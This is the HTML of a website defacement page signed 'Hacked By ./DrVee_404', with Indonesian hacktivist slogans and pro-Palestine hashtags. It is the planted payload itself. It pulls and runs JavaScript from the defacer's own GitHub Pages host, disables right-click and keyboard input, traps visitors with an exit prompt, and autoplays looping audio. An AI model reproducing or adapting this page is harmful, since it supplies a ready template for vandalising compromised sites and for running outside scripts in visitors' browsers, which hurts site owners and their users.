<html>
<head>
    <meta charset="UTF-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta property="og:title" content="Hacked By ./DrVee_404">
    <meta name="description" content="Esteem Restoration Eagle">
    <meta name="keywords" content="hacked, hacker, deface, wordpress, website, whitehat, blackhat, greyhat, defacer, hack, mirror, Drv7.ID">
    <meta property="og:description" content="Drv7.ID">
    <meta property="og:image" content="https://drvee07.github.io/eagle.png">
    <meta name="theme-color" content="#fff">
    <title>Hacked By ./DrVee_404</title>
    <link href="https://drvee07.github.io/eagle.png" rel="shortcut icon">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
    <style type='text/css'>body,a:hover{cursor:url(http://cur.cursors-4u.net/symbols/sym-1/sym46.cur),progress!important;}</style>
</head>
<body bgcolor="black" text="white" oncontextmenu="return false;" onkeydown="return false;" onmousedown="return false;" onclick="document.getElementById('lagu').play();fs()" id="body" onload="typeWriter()">
    <style type="text/css">@import url("https://fonts.googleapis.com/css2?family=Kelly+Slab&display=swap"); center { font-family: Kelly Slab; } img { opacity: 80%; } red { color: red; }</style>
    <script language="JavaScript"> window.onbeforeunload = confirmExit; function confirmExit() { return "are you sure ? wkwk"; }</script>
    <table width="100%" height="80%"><td>
        <center>
            <script type="text/javascript" src="https://drvee07.github.io/loc/rev.js"></script>
            <img src="https://drvee07.github.io/palestina.jpg" width="300"><br><br>
            <font color="red" size="5"><i>[+] Hacked By ./DrVee_404 [+]</i><br><<<-------Esteem Restoration Eagle------>>></font><br><br>
            <p>Bingungkan Mereka Dengan Diam Mu & Kejutkan Mereka Dengan Aksi MU!!</p>
            <font size="2">#CyberMuslim - #SavePalestine - #FreePalestine</font>
            <p>[+] INDONESIAN HACKER RULES [+]</p></font><audio autoplay="autoplay" loop="loop" id="lagu"src="https://drvee07.github.io/loc/keepingscore.mp3"></audio>
            <script type="text/javascript" src="https://drvee07.github.io/loc/indo.jt.js"></script>
            <script type="text/javascript"> drvee.init("https://drvee07.github.io/loc/jet.png"); </script>
        </center></td>
    </table>
</body>
</html>